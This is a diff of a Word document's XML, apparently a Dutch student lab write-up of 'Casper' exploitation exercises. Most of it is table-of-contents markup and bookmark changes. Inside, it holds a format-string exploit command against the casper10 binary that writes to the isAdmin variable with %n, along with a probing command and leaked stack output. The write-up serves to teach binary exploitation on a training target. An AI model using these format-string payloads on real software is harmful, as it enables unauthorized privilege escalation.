+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704218" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>Mitigation</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704218 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704219" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>Advanced level: Casper80</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704219 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704220" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Casper</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704220 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704221" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>Omschrijving</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704221 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704222" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>Vulnerability</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704222 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704223" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>Exploit beschrijving</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704223 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704224" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>Mitigation</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704224 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1315,7 +2133,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc25519919"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc26704201"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -1876,7 +2694,7 @@
         <w:pStyle w:val="Kop1"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc25519920"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc26704202"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper4</w:t>
@@ -1891,7 +2709,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc25519921"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc26704203"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -2082,7 +2900,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc25519922"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc26704204"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
@@ -2247,7 +3065,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc25519923"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc26704205"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -2898,7 +3716,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc25519924"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc26704206"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -3256,7 +4074,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc25519925"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc26704207"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -3352,7 +4170,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc25519926"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc26704208"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper</w:t>
@@ -3373,7 +4191,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc25519927"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc26704209"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -3716,7 +4534,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc25519928"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc26704210"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -3861,7 +4679,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc25519929"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc26704211"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -4106,7 +4924,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc25519930"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc26704212"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -4353,7 +5171,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc25519931"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc26704213"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -4481,6 +5299,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc26704214"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper</w:t>
@@ -4491,6 +5310,7 @@
         </w:rPr>
         <w:t>8</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4500,12 +5320,14 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc26704215"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Omschrijving</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4639,12 +5461,14 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc26704216"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:t>Vulnerability</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4778,12 +5602,14 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc26704217"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Exploit beschrijving</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5292,6 +6118,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc26704218"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -5300,6 +6127,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Mitigation</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="17"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -5584,6 +6412,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc26704219"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -5602,6 +6431,7 @@
         </w:rPr>
         <w:t>0</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5673,6 +6503,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc26704220"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper</w:t>
@@ -5683,6 +6514,7 @@
         </w:rPr>
         <w:t>10</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5692,12 +6524,14 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Toc26704221"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Omschrijving</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5913,520 +6747,700 @@
       <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>gdb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>) p &amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>isAdmin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>$1 = (int *) 0x8049938 &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>isAdmin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc26704222"/>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>casper</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>/casper10 $(python -c 'print "D" + "\x38\x99\x04\x08" + "%x"*6 + "%n"')</w:t>
-      </w:r>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Casper10 heeft een format-string </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dat een data-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>only</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack kan veroorz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">aken. Zowel stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> als </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>een niet uitvoerbare</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stack zijn ingeschakeld.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Het doel van deze exploit is om de waarde van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>isAdmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variabele te veranderen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> naar een positieve waarde.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="_Toc26704223"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Exploit beschrijving</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Om deze exploit te vinden ben ik begonnen door het programma te laten crashen. Dit heb ik gedaan door middel van de volgende code: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>casper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/casper10 AAAA$(python -c 'print ".%08x"*15') </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze code gaat 4 maal een “A” printen gevolgd door 15 maal “.%08x”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit geeft de volgende uitvoer: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>HelloAAAA.080486d0.bffff7d1.bffff7d1.001b023c.6c654808.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:u w:val="single"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>41</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>206f6c.2e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:u w:val="single"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>414141</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
